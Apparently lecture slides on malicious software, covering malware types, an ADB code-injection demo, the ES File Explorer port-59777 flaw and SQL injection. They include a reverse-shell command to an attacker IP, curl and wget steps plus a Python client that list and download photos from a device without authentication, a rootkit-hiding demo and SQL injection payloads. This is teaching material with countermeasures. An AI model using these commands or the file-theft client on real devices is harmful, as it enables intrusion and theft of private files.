
Chapter 3: Malicious Software and Security Countermeasures


Malicious Software
• Malware is malicious software: code that is delivered to and executed on a victim
  system using different approaches, including code injection
• Has an effect that the user did not intend
• This umbrella term covers a whole range of different types of software
• Can be introduced onto a system in a number of different ways
Malicious Software
• Runs on a computer (or a mobile device!)
• System or user may activate it
• Reasons for malware include:
• Access personal information
• Obtain account information
• Access/move/delete files
• Fun
• Use the victim computer to commit a crime
Types of Malware
• The generic term can be used to describe some of the following:
• Viruses
• Worms
• Ransomware
• Trojans
• RATs
• Rootkits
• Backdoors
• Logic Bombs
Malicious Software
It is all about code injection (small demo)
• How to get into an Android device in a few easy steps using adb
• Precondition: the victim phone must already have ADB debugging enabled over TCP
  (on port 9966 in this example) so that adbd accepts connections from the network.
  Getting the phone into that state is a separate delivery problem, whether by an
  SD card, a website, or a vulnerability in a file format such as a PDF embedded in
  an email or document; that step is not shown here.
• The two commands below are then run from the attacker's machine, not on the phone:
• adb connect {replace_with_victim_ip}:9966
• adb shell 'sh -i >& /dev/tcp/{replace_with_your_ip}/6699 0>&1'
• The reverse-shell command is quoted so that the redirection is interpreted by the
  shell on the device rather than by the attacker's local shell; /dev/tcp and the >&
  redirection are bash features, so whether this works depends on which shell the
  device provides. Start a listener on the attacker side first, e.g. nc -lvp 6699.

• See this video: https://www.youtube.com/watch?v=opk8lWuZm70
This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:
ES File Explorer is very popular, with over 100 million downloads. However, it
exposes your phone to remote control over the network: while the app is running it
listens on TCP port 59777 and accepts commands from anyone who can reach that port,
with no authentication (the curl commands below need no credentials).
(Screenshots on the original slides: launching the app; the app interface)
Connecting to your Android Device with ADB
On Kali, in a Terminal, execute these commands, replacing the IP address with the IP
address of the Android device:
• adb connect 172.16.123.154
• adb devices -l
• adb connect only succeeds if adbd on the device is listening on TCP (port 5555 by
  default); adb devices -l should then list the device with its transport details.
• https://www.youtube.com/watch?v=BCCiEZ9VJ2g
Viewing the Listening Process
• On Kali, in a Terminal, execute these commands (the first opens an interactive
  shell on the device, the last one leaves it):
• adb shell
• netstat -pant | grep LISTEN
• exit
• You see a process named "com.estrongs.android.pop" (ES File Explorer) listening on
  port 59777
• On Kali, in a Terminal, execute this command, replacing the IP address with the IP
  address of the victim Android device:
• curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777
• The device answers with a JSON description of itself, which confirms that the
  service is reachable and takes commands without any authentication
Stealing a photo
• On Kali, in a Terminal, execute this command, replacing the IP address with the IP
  address of your Genymotion Android device:
• curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777
• The reply lists the pictures on the device together with their on-device paths;
  pick one for the next step
Stealing a picture
On Kali, in a Terminal, execute this command, replacing the IP address and path with
the correct values for your system (the file is fetched with a plain GET of its
absolute on-device path):

wget http://172.16.123.154:59777/storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg

The file downloads, as shown below.


Stealing a picture
On Kali, in a Terminal, execute this command to view the file, replacing the filename
with the correct name on your system:

xdg-open IMG_20190116_141301.jpg

The file appears, as shown below.
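The whole procedure above (POST a JSON command with a single "command" key to port 59777, then GET a file by its absolute on-device path) as a small Python client. This is an added example, not code from the original slides or from ES File Explorer. To run offline it talks to a constructed local mock of the vulnerable service; the mock's reply fields (name, ftpRoot, ftpPort, location) are assumptions, since the slides only show the requests. Pointing es_command and es_fetch at a real device IP on port 59777 reproduces the curl and wget steps.

```python
"""Client for the unauthenticated ES File Explorer command interface on TCP 59777,
exercised against a constructed local mock so the example runs offline."""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ES_PORT = 59777
# Opener with proxies disabled so 127.0.0.1 is never routed through an http_proxy.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def es_command(host, command, port=ES_PORT, timeout=5):
    """POST {"command": ...} as application/json (the curl format above) and return
    the parsed JSON reply."""
    body = json.dumps({"command": command}).encode()
    req = urllib.request.Request(f"http://{host}:{port}", data=body,
                                 headers={"Content-Type": "application/json"},
                                 method="POST")
    with _OPENER.open(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


def es_fetch(host, path, port=ES_PORT, timeout=5):
    """GET a file by its absolute on-device path, exactly as the wget step does."""
    with _OPENER.open(f"http://{host}:{port}{path}", timeout=timeout) as resp:
        return resp.read()


def steal_first_picture(host, port=ES_PORT):
    """Replay the slides: enumerate pictures, then download the first one.
    Returns (on-device path, file bytes), or (None, b"") if there are none."""
    pics = es_command(host, "listPics", port=port)
    if not pics:
        return None, b""
    path = pics[0]["location"]
    return path, es_fetch(host, path, port=port)


# --- constructed mock of the vulnerable service; reply shapes are assumptions ---
MOCK_PIC = "/storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg"
MOCK_FILES = {MOCK_PIC: b"\xff\xd8\xff\xe0" + b"fake-jpeg-body"}  # not a real JPEG
MOCK_REPLIES = {
    "getDeviceInfo": {"name": "Genymotion", "ftpRoot": "/sdcard", "ftpPort": "3721"},
    "listPics": [{"name": "IMG_20190116_141301.jpg", "location": MOCK_PIC}],
}


class MockESHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_POST(self):  # command interface: JSON in, JSON out, no auth check
        length = int(self.headers.get("Content-Length", 0))
        try:
            cmd = json.loads(self.rfile.read(length)).get("command")
        except ValueError:
            cmd = None
        reply = MOCK_REPLIES.get(cmd)
        if reply is None:
            self._send(400, json.dumps({"error": "unknown command"}).encode())
        else:
            self._send(200, json.dumps(reply).encode())

    def do_GET(self):  # file download: any absolute path, no auth check
        data = MOCK_FILES.get(self.path)
        self._send(200 if data is not None else 404, data or b"not found")

    def _send(self, status, payload):
        self.send_response(status)
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


def start_mock():
    """Start the mock on 127.0.0.1 on a free port; return (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockESHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    server, port = start_mock()
    print(es_command("127.0.0.1", "getDeviceInfo", port=port))
    path, data = steal_first_picture("127.0.0.1", port=port)
    print(path, len(data), "bytes")
    server.shutdown()
    server.server_close()
```

The client never sends a credential of any kind, which is the whole point: anything on the same network segment can enumerate and pull files while the app is open.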
Viruses
• "Everything is a virus"
• This is an example of the media not understanding the subject
• Actually less common than other types of malware
• Requires a host file to infect, just like a biological virus requires a cell; this
  limits the ability of the virus to replicate across diverse systems
• E.g. Excel macro viruses
Worms
• Self-replicating malware
• Has a method of autonomous propagation
• Typically used to create botnets by infecting a large number of hosts
• Sasser worm exploited MS04-011
• https://technet.microsoft.com/en-us/library/security/ms04-011.aspx
• Conficker worm exploited MS08-067
• https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
Ransomware
• Encrypts files and hard drives
• Typically asks for payment in virtual currency
• Deadline for payment, after which the files will not be decrypted
• No guarantee that files will be decrypted on payment
Rootkits
• Rootkits work by hijacking different levels of a computer system.
• For example, a rootkit at the kernel level will intercept a call to open() and
  execute its own code before (or instead of) the real implementation.
• A virus scanner makes an operating system call to list the files in a directory
  whose actual contents are Good.exe and Bad.exe, where Bad.exe is the rootkit
  executable.
• The rootkit intercepts that system call and returns only Good.exe, so the scanner
  has no knowledge of the rootkit's existence: the hiding is implemented at the
  operating-system level, below the scanner.
• Countermeasure: compare the view the OS API gives with an independent view of the
  same data (raw disk, or a scan from a trusted boot medium); any difference reveals
  what is being hidden.
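As an added illustration (not from the slides) of the hiding trick just described, done in user space with Python: the directory-listing call a scanner relies on is hooked to filter out the rootkit's file, and the standard countermeasure, a cross-view comparison between the hooked API and an independent view of the same directory, exposes the discrepancy. The Good.exe/Bad.exe names and the "hide anything starting with Bad" rule are constructed for the demo; a real rootkit hooks readdir()/open() in libc or in the kernel rather than a Python function, and a real detector reads the raw filesystem rather than a second library call.

```python
"""User-land model of a rootkit hiding its files from a scanner, plus the
cross-view detection that catches it."""
import os
import tempfile

HIDDEN_PREFIX = "Bad"  # constructed rule: the rootkit hides names starting with "Bad"


def install_hook():
    """Monkey-patch os.listdir the way a rootkit patches readdir()/open().
    Returns the original function so the hook can be removed again."""
    real_listdir = os.listdir

    def hooked_listdir(path="."):
        # Everything the scanner asks for, minus the rootkit's own files.
        return [n for n in real_listdir(path) if not n.startswith(HIDDEN_PREFIX)]

    os.listdir = hooked_listdir
    return real_listdir


def scanner_view(path):
    """What a naive scanner sees: it trusts the (possibly hooked) high-level API."""
    return sorted(os.listdir(path))


def low_level_view(path):
    """An independent view of the same directory via os.scandir.
    Assumption for this demo: the rootkit hooked only os.listdir, so scandir
    is still honest; a real detector would read the raw disk instead."""
    with os.scandir(path) as it:
        return sorted(entry.name for entry in it)


def cross_view_diff(path):
    """Names present in the independent view but missing from the API view.
    A non-empty result is the classic rootkit indicator."""
    return sorted(set(low_level_view(path)) - set(scanner_view(path)))


def demo():
    """Create Good.exe and Bad.exe, install the hook, scan, detect.
    Returns (what the scanner saw, what cross-view detection recovered)."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("Good.exe", "Bad.exe"):
            with open(os.path.join(d, name), "wb") as f:
                f.write(b"MZ")  # constructed placeholder content, not a real PE
        real = install_hook()
        try:
            seen = scanner_view(d)       # Bad.exe is filtered out here
            hidden = cross_view_diff(d)  # ... and shows up again here
        finally:
            os.listdir = real            # remove the hook before cleanup
        return seen, hidden


if __name__ == "__main__":
    print(demo())
```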
Logic Bombs and Backdoors
• Logic Bombs execute malicious actions when a certain event is
triggered or a period of time has gone by
• Backdoors are code within an application, created intentionally or
unintentionally, that enable unauthorised access to networks or
systems
Spyware
• Will not cause any direct damage to the system
• Can install other software (e.g. a key-logger)
• Does not self-replicate, but it could be deployed by a worm or trojan
• Hidden and hard to detect
• Collects information which is then sent to third parties without the owner's consent
• Attaches itself to your operating system
RATs (Remote Administration Tools)
• Allow an attacker to manipulate the victim computer
• Often provide a stealthy communication channel
• May allow for management of a large number of victims
• Remote Access Tools (RATs) are very popular because they can give remote access to a
  large number of devices concurrently
Adware
• Will not cause any direct damage to the system
• Displays pop-up adverts for monetary gain
Botnets
• A botnet is a large number of computers controlled by a bot master over the Internet
• It could come as a shock to you to know that your computer at this very moment may be
  sending spam email, distributing child pornography or helping to crash Twitter's
  servers in a bid to take them offline.
• A bot is installed by a type of trojan, a form of malware hiding in your operating
  system waiting idly by for instructions from a command and control server that is
  controlled by a criminal, known as a botmaster or bot herder.
Code Injection in Web Applications
• SQL injection: the attacker supplies input (a form field, URL parameter or cookie)
  that contains SQL syntax; the web application concatenates it into a query string,
  which is then passed to the database server.
• The SQL server parses and executes the injected text as part of the query, so the
  attacker's input is treated as code rather than as data.
• Countermeasure: parameterised (prepared) queries, which hand user input to the
  database separately from the SQL text.
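The flow just described, as an added example that is not taken from the slides, using Python's built-in sqlite3 against a constructed in-memory users table: the string-built query lets the database parse attacker input as SQL, while the parameterised version of the same login check treats the identical input as plain data.

```python
"""SQL injection in a login check: vulnerable string concatenation beside the
parameterised replacement, on a constructed sqlite3 table."""
import sqlite3


def make_db():
    """Constructed users table for the demo (two accounts, plaintext for brevity)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the SQL text; the database then parses
    whatever the attacker typed as part of the query. Returns the matched
    username or None."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the SQL text is fixed and the input travels as bound
    values, so quotes and comment markers in it are never interpreted."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Tautology payload: ... AND password = '' OR '1'='1' matches every row.
    print(login_vulnerable(conn, "alice", "' OR '1'='1"))  # alice
    # Comment payload: username = 'bob'-- ... drops the password check entirely.
    print(login_vulnerable(conn, "bob'--", "wrong"))       # bob
    # The same payloads are inert once bound as parameters.
    print(login_safe(conn, "alice", "' OR '1'='1"))        # None
    print(login_safe(conn, "bob'--", "wrong"))             # None
```

Both payloads work because the attacker controls the boundary between data and SQL text; binding the values removes that boundary from the attacker's reach, which is why parameterised queries, not input filtering, are the primary defence.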
Zero Day Exploits
